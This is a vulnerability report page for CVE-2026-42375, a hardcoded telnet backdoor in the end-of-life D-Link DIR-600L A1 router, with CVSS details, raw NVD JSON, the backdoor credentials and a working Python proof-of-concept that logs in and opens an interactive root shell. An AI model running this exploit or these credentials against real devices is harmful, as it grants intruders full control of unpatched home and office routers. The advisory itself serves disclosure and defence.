Security Vulnerability Report
中文
CVE-2026-42375 CVSS 9.8 CRITICAL

CVE-2026-42375

Published: 2026-05-04 17:16:26
Last Modified: 2026-05-06 12:17:38
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

D-Link DIR-600L Hardware Revision A1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir600l" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-600l_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-600l:a1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-600L Hardware Revision A1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import telnetlib import sys # Target IP address of the vulnerable device TARGET_IP = "192.168.0.1" TARGET_PORT = 23 # Hardcoded credentials extracted from firmware USERNAME = "Alphanetworks" PASSWORD = "wrgn35_dlwbr_dir600l" def exploit(): try: print(f"[*] Attempting to connect to {TARGET_IP} on port {TARGET_PORT}...") # Establish a Telnet connection tn = telnetlib.Telnet(TARGET_IP, TARGET_PORT, timeout=10) print("[*] Connection established. Waiting for login prompt...") # Wait for the login prompt (likely 'login: ') tn.read_until(b"login: ", timeout=5) tn.write(USERNAME.encode('ascii') + b"\n") # Wait for the password prompt (likely 'Password: ') tn.read_until(b"Password: ", timeout=5) tn.write(PASSWORD.encode('ascii') + b"\n") print("[*] Credentials sent. Checking for shell access...") # Interact with the shell to verify root access tn.write(b"id\n") response = tn.read_until(b"uid=0(root)", timeout=5) if b"uid=0(root)" in response: print("[+] SUCCESS! Root shell obtained.") print("[+] Dropping into interactive shell...") tn.interact() else: print("[-] Failed to obtain root shell. Credentials might be incorrect or patched.") tn.close() except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42375", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-04T17:16:25.847", "lastModified": "2026-05-06T12:17:37.573", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "D-Link DIR-600L Hardware Revision A1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username \"Alphanetworks\" and the static password \"wrgn35_dlwbr_dir600l\" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-600l_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "585AD6F9-C845-430D-B77B-7463872EAD98"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-600l:a1:*:*:*:*:*:*:*", "matchCriteriaId": "F75E7D9C-03BE-4301-AF9E-9929C33F4EEA"}]}]}], "references": [{"url": "https://www.securin.io/zero-day/cve-2026-42375-hardcoded-telnet-backdoor-in-d-link-dir-600l-a1-end-of-life-", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.securin.io/zero-day/cve-2026-42375-hardcoded-telnet-backdoor-in-d-link-dir-600l-a1-end-of-life-", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}